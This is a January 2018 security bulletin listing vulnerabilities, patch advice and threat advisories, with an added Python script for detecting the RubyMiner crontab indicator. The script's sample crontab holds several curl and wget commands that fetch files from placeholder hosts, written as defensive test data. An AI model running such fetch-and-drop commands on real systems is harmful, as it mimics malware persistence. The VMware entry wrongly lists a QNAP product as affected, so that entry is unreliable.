Rampant Cybersecurity Bulletin

January 2018

Latest Cybersecurity News

The latest cybersecurity news so that you can stay on top of what is going on in the cybersecurity world. Click titles below for more details.

Meltdown and Spectre CPU Vulnerabilities Discovered

Reported: January 8, 2018
Details: A vulnerability affecting a large percentage of CPU chips has been discovered, arising from the speculative execution and caching properties of the chips. The vulnerability could leak critical information, such as encryption keys, to a potential local attacker.
References:

Intel Warns Users not to Install its Meltdown and Spectre Patches

Reported: January 22, 2018
Details: Intel has warned users not to install the Spectre and Meltdown patches due to buggy behavior, including blue screens, unpredictable system behavior, and unplanned reboots. Vendors are working with Intel on new BIOS patches and will release updates as they become available.
References:

Apple Hands Over Control Of Chinese Data Centers to Chinese Company

Reported: January 11, 2018
Details: In order to comply with Chinese government policy, Apple has handed control of its China-based cloud infrastructure to a Chinese company. As part of the deal, both Apple and Guizhou-Cloud Big Data Industry will have access to user data stored in the Chinese iCloud.
References:

New WiFi Standard WPA3 Set to Be Launched Before End of 2018

Reported: January 10, 2018
Details: The WiFi alliance officially announced the WPA3 WiFi standard, meant to replace WPA2. It is scheduled to be released before the end of 2018.
References:

US Bill Aimed At Fining Companies Based on Information Breaches

Reported: January 10, 2018
Details: The United States Government is set to vote on a bill that would give the FTC the power to punish companies that were hacked while following poor cybersecurity practices. The aim is to hold companies accountable for preventable data breaches. The punishments include fines assessed per user and per piece of information exposed.
References:

Hard-Coded Password Allows Hackers to Bypass Lenovo’s Fingerprint Scanner

Reported: January 30, 2018
Details: A wide range of Lenovo laptop models had a vulnerability affecting the fingerprint scanner. A weak encryption algorithm made it possible for someone with non-admin privileges to read logon credentials and fingerprint data.
References:

Remote Code Execution Vulnerability Discovered for Electron JS Framework

Reported: January 25, 2018
Details: Applications based on the ElectronJS framework such as Skype, GitHub Desktop, and Slack were found to be vulnerable to a remote code execution vulnerability due to a flaw in the Electron framework itself. The vulnerability affects apps that run on Microsoft Windows. A new version of the ElectronJS framework has been released to patch this vulnerability.
References:

Previous Cybersecurity Bulletins

Not sure if you are vulnerable?  Rampant specializes in vulnerability assessments and penetration testing for small & mid-size businesses!

New High Risk Vulnerabilities

You should be aware of the following vulnerabilities, and we recommend patching them immediately if they apply to your systems.  Click titles below for more details.

Cisco ASA webvpn Remote Code Execution

Reported: January 29, 2018
Affected Products:
  • 3000 Series Industrial Security Appliance (ISA)
  • ASA 5500 Series Adaptive Security Appliances
  • ASA 5500-X Series Next-Generation Firewalls
  • ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
  • ASA 1000V Cloud Firewall
  • Adaptive Security Virtual Appliance (ASAv)
  • Firepower 2100 Series Security Appliance
  • Firepower 4110 Security Appliance
  • Firepower 9300 ASA Security Module
  • Firepower Threat Defense Software (FTD)
Details: A remote attacker can execute arbitrary code on the system due to a flaw in the SSL VPN function. An attacker can send XML packets to a webvpn-configured interface and execute arbitrary code on the remote system.
Solution: Patch to the latest software when it becomes available.
Reference:

Apache NiFi Code Execution

Reported: January 12, 2018
Affected Products: Apache NiFi 1.0.0 and 1.4.0
Details: A remote attacker could execute arbitrary code on the system due to improper handling of a malicious X-ProxyContextPath header containing embedded code.
Solution: Upgrade to the latest version of Apache NiFi (1.5.0 or later)
References:

CMS Made Simple Code Execution

Reported: January 2, 2018
Affected Products:
CMS Made Simple 2.1.6
CMS Made Simple 2.2.0
CMS Made Simple 2.2.1
Details: A remote attacker could execute arbitrary code on the system due to Smarty Templating Injection in some core modules.
Solution: Upgrade to latest version of CMS Made Simple (2.2.2 or later)
References:

Oracle Virtualization VM VirtualBox Core

Reported: January 16, 2018
Affected Products:
Oracle VM VirtualBox 5.1.30
Oracle VM VirtualBox 5.2.4
Details: An unspecified vulnerability could allow an authenticated attacker to take control of the hypervisor.
Solution: Refer to Oracle Critical Patch Update Advisory for Patch.
Reference:

Sourcetree for Windows Command Execution

Reported: January 19, 2018
Affected Products:
Atlassian Sourcetree for Windows 0.5.1.0
Atlassian Sourcetree for Windows 2.4.6.0
Details: A remote authenticated attacker could execute arbitrary commands on the system due to a flaw in Mercurial and Git repository handling.
Recommendation: Refer to Security Advisory for Patch.
References:

VMware Workstation and Fusion Code Execution

Reported: January 10, 2018
Affected Products: QNAP Qsync for Windows 4.2.2.0724
Details: A local authenticated attacker can execute arbitrary code on the system due to an error in the IPv6 mode of the VMware NAT service.
Solution: Patch system to latest possible version using VMware security advisory.
References:

Linux Kernel Denial of Service

Reported: January 3, 2018
Affected Products: Linux Kernel 4.14.11
Details: The Linux Kernel is vulnerable to a denial of service from a remote attacker due to an out-of-bounds write flaw reachable via vectors including TLS.
Solution: Patch to the latest kernel when it becomes available.
Reference:

New Threat Advisories

You should be aware of the following threats and implement the recommended mitigations to ensure your systems are not impacted.  Click titles below for more details.

RubyMiner Cryptocurrency Miner Targets Webservers

Reported: January 16, 2018
Details: A new malware package has been released based on a variation of the Monero miner XMRig. The new package targets webservers running PHP, Ruby on Rails, and IIS, exploiting a vulnerability in Ruby on Rails. One sign that a webserver is infected is a crontab entry that downloads a robots.txt file every hour.
Reference:
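The indicator above (an hourly crontab entry fetching a robots.txt file) is easy to check for on a suspected host. The following is an added example, not code from the bulletin or from any RubyMiner analysis: it parses user-crontab lines, flags entries that use curl or wget to retrieve a robots.txt URL, and notes whether the schedule is hourly. The sample crontab text and the IP addresses in it are constructed for illustration (RFC 5737 documentation ranges), not real indicators.

```python
import re
from dataclasses import dataclass

# Constructed sample of `crontab -l` output for one user; not taken from a real host.
# The two robots.txt fetchers mimic the indicator described in the bulletin.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
* * * * * /usr/bin/php /var/www/app/artisan schedule:run
1 * * * * wget -q -O /tmp/.x http://192.0.2.10/robots.txt
@hourly curl -s -o /tmp/.y http://203.0.113.5/robots.txt
*/30 * * * * curl -s http://example.invalid/robots.txt -o /tmp/r
"""

# Commands that fetch over HTTP; extend this if your hosts use other downloaders.
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b")
ROBOTS_RE = re.compile(r"robots\.txt", re.IGNORECASE)


@dataclass
class CronEntry:
    schedule: str  # five-field spec or an @-shortcut such as @hourly
    command: str


def parse_crontab(text):
    """Split user-crontab text into (schedule, command) entries.

    Assumes the 5-field user format; /etc/crontab adds a user column that
    this parser does not handle. Comments and blank lines are skipped.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):  # @hourly, @daily, @reboot ...
            spec, _, cmd = line.partition(" ")
            entries.append(CronEntry(spec, cmd.strip()))
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:  # malformed line; not a schedulable entry
            continue
        entries.append(CronEntry(" ".join(parts[:5]), parts[5]))
    return entries


def is_hourly(schedule):
    """True for @hourly or 'M * * * *' style specs (fixed minute, every hour)."""
    if schedule == "@hourly":
        return True
    fields = schedule.split()
    if len(fields) != 5:
        return False
    minute, hour, dom, mon, dow = fields
    return minute.isdigit() and hour in ("*", "*/1") and dom == mon == dow == "*"


def find_robots_fetchers(text):
    """Return crontab entries that download a robots.txt URL, with an hourly flag."""
    hits = []
    for entry in parse_crontab(text):
        if ROBOTS_RE.search(entry.command) and DOWNLOADER_RE.search(entry.command):
            hits.append({
                "schedule": entry.schedule,
                "command": entry.command,
                "hourly": is_hourly(entry.schedule),
            })
    return hits


if __name__ == "__main__":
    for hit in find_robots_fetchers(SAMPLE_CRONTAB):
        tag = "HOURLY" if hit["hourly"] else "other"
        print(f"[{tag}] {hit['schedule']}  {hit['command']}")
```

In practice you would feed it the output of `crontab -l` for each account (and inspect /etc/cron.d and /etc/cron.hourly separately). Any match warrants a closer look at the host; the hourly flag only marks the entries that fit the specific pattern reported for this miner.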

Smoke Loader Malware Disguised as Spectre/Meltdown Patch

Date: January 17, 2018
Description: Aiming to benefit from the confusion surrounding Spectre patching, criminals have been distributing their own malware-laden “patches” via phishing campaigns. The most notable is a website posing as the “German Federal Office for Information Security”, which is used in a phishing campaign to entice consumers to download a patch from the site. The patch is known to contain the Smoke Loader malware, resulting in system compromise.
Recommendations: 
1. Beware of suspicious emails, especially those claiming to offer patches for Spectre or Meltdown.
2. Always download patches from the vendor's site, not from third parties.
Resources:

IBM Published 2017 Data Breach Review

Reported: January 18, 2018
Details: IBM published a detailed report of security incidents, including information about the number of leaked records, breaches by industry, and breaches by attack type. The report is linked below.
References:

Espionage Campaign "Dark Caracal" Believed to be Run by Lebanese Government

Reported: January 23, 2018
Details: A new espionage campaign, named “Dark Caracal”, targets Android phones. This campaign is thought to be the first mobile APT operated at a global scale. Attackers use numerous ways to infect victims, including fake WhatsApp messages. The malware does not use zero-day exploits, but rather relies on the permissions granted to it at install time. Some programs installed via the campaign matched the original, non-malicious programs in functionality.
References: